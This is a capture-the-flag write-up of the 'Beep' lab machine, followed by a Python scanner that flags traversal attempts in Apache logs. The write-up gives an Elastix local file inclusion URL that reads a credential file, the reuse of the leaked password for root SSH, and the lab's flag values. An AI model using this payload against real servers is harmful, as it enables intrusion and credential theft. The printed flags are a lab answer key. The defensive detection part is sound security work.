Summary

Beep is an easy Linux box that can be exploited by properly enumerating all ports and services. On the web server you will find an Elastix login portal. This Elastix version is vulnerable to a local file inclusion (LFI), which leaks root credentials that you can use to open an SSH shell. It is worth mentioning that there are other methods of exploiting this host.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.129.28.190

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp?
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.129.28.190/
110/tcp   open  pop3?
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            939/udp   status
|_  100024  1            942/tcp   status
143/tcp   open  imap?
443/tcp   open  ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_ssl-date: 2020-10-26T10:54:32+00:00; +1h01m55s from scanner time.
993/tcp   open  imaps?
995/tcp   open  pop3s?
3306/tcp  open  mysql?
|_mysql-info: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Host: 127.0.0.1

The first thing I checked was the web server. The user is presented with a login page carrying an Elastix logo.


Exploitation

Searching Google for Elastix turns up several exploits, one of which is a local file inclusion; that is the one used here. The exploit code already contains the URL you have to request, which is:

[host]/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

So there is no need to run the exploit script: paste this URL into the browser and the contents of the included file come back. Searching the output for the string "password" gives several matches, one of which is AMPDBPASS. This password was reused to open an SSH shell as root. At first I got the following error message: Unable to negotiate with 10.129.28.190 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1.
The solution is to re-enable one of the offered legacy key exchange methods on the client with the following command:

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 root@10.129.28.190

Enter the password you obtained from the LFI and you have a root shell:

[root@beep fanis]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@beep fanis]# cat /root/root.txt
d88e006123842106982acce0aaf453f0

[root@beep fanis]# cat /home/fanis/user.txt
aeff3def0c765c2677b94715cffa73ac

It is worth mentioning that there are other, more complicated, ways to exploit this box. They are pretty cool! Check out IppSec for the other ways :)
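From the defensive side, requests like the graph.php one above leave an obvious trace in the Apache access log. The following Python script is an added example (not part of the original writeup or of Elastix): it decodes every query parameter in Common Log Format lines and flags directory traversal sequences and embedded null bytes. The log lines are constructed samples, not captures from the box.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample Apache access-log lines (not captured from the box).
# Line 1 mirrors the vtigercrm graph.php request used above, line 2 is benign,
# line 3 is a double-encoded traversal attempt against another script.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Oct/2020:10:55:01 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 5123
10.0.0.7 - - [26/Oct/2020:10:55:02 +0000] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts&action=index HTTP/1.1" 200 812
10.0.0.9 - - [26/Oct/2020:10:55:03 +0000] "GET /index.php?page=..%252f..%252fetc%252fpasswd HTTP/1.1" 404 210
"""

# Common Log Format: client ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def is_inclusion_payload(value):
    """True if a decoded query value carries a directory traversal sequence or an
    embedded null byte (the %00 seen in the request above)."""
    return "../" in value or "..\\" in value or "\x00" in value


def find_lfi_attempts(log_text):
    """Return (client, path, parameter, decoded value, status) for every request
    whose query string looks like a file-inclusion attempt."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a CLF request line; skip
        parts = urlsplit(m["target"])
        # parse_qs percent-decodes once; unquote again to catch %252e style double encoding
        for param, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                decoded = unquote(value)
                if is_inclusion_payload(decoded):
                    hits.append((m["src"], parts.path, param, decoded, int(m["status"])))
    return hits


if __name__ == "__main__":
    for src, path, param, value, status in find_lfi_attempts(SAMPLE_LOG):
        print(f"{src} {path} param={param} status={status} value={value!r}")
```

A 200 status on a flagged request, as in the first sample line, is the case worth escalating: the file was most likely served.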